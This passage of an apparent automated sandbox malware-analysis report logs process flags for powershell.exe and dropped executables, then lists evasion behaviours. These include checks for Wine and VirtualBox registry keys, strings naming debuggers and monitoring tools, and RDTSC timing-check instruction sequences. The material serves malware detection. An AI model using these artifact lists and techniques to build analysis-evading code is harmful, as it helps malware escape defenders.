                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12315
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9688
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720734859.000000000041F000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2390CC second address: 2390E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007FD7ED120772h 0x0000000c jne 00007FD7ED120766h 0x00000012 jnc 00007FD7ED120766h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2390E4 second address: 239105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FD7ECCCADE6h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 224CB6 second address: 224CE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Eh 0x00000007 jmp 00007FD7ED12076Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FD7ED120772h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23846B second address: 23847F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD7ECCCADE6h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnp 00007FD7ECCCADE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2386FB second address: 2386FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2386FF second address: 238705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 238705 second address: 23871A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD7ED12076Dh 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23BFFD second address: 23C003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C1AC second address: 23C1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C226 second address: 23C2E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FD7ECCCADE6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FD7ECCCADF1h 0x00000018 jnc 00007FD7ECCCADECh 0x0000001e popad 0x0000001f nop 0x00000020 mov dx, bx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FD7ECCCADE8h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov edi, ecx 0x00000041 jnp 00007FD7ECCCADECh 0x00000047 and ecx, 2EDD0C5Ch 0x0000004d push 62178771h 0x00000052 jmp 00007FD7ECCCADF6h 0x00000057 xor dword ptr [esp], 621787F1h 0x0000005e sbb esi, 7130394Fh 0x00000064 push 00000003h 0x00000066 mov dword ptr [ebp+122D279Ah], esi 0x0000006c push 00000000h 0x0000006e adc esi, 585245A3h 0x00000074 push 00000003h 0x00000076 sbb si, FBB8h 0x0000007b push AA3632BCh 0x00000080 pushad 0x00000081 pushad 0x00000082 jmp 00007FD7ECCCADF4h 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24D68B second address: 24D691 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24D691 second address: 24D6A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD7ECCCADE6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jc 00007FD7ECCCADEEh 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A2B1 second address: 25A2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A419 second address: 25A42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ECCCADEBh 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A74C second address: 25A750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A750 second address: 25A75E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25AA29 second address: 25AA39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jno 00007FD7ED120766h 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25AA39 second address: 25AA40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25AB7B second address: 25AB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ED120766h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25AB8C second address: 25AB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25AB90 second address: 25ABB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120775h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25ABB1 second address: 25ABB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25ABB7 second address: 25ABBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25ABBD second address: 25ABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B010 second address: 25B01E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B01E second address: 25B022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B022 second address: 25B028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B152 second address: 25B175 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007FD7ECCCADE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD7ECCCADF7h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B2F4 second address: 25B309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jg 00007FD7ED12076Ch 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B453 second address: 25B459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25191F second address: 251934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD7ED12076Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B5B8 second address: 25B5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B5C5 second address: 25B605 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ED120775h 0x00000008 jmp 00007FD7ED12076Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007FD7ED12077Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FD7ED120766h 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25BBFD second address: 25BC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C064 second address: 25C071 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2280F1 second address: 2280F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 263BE0 second address: 263BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26420F second address: 264214 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2689FD second address: 268A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
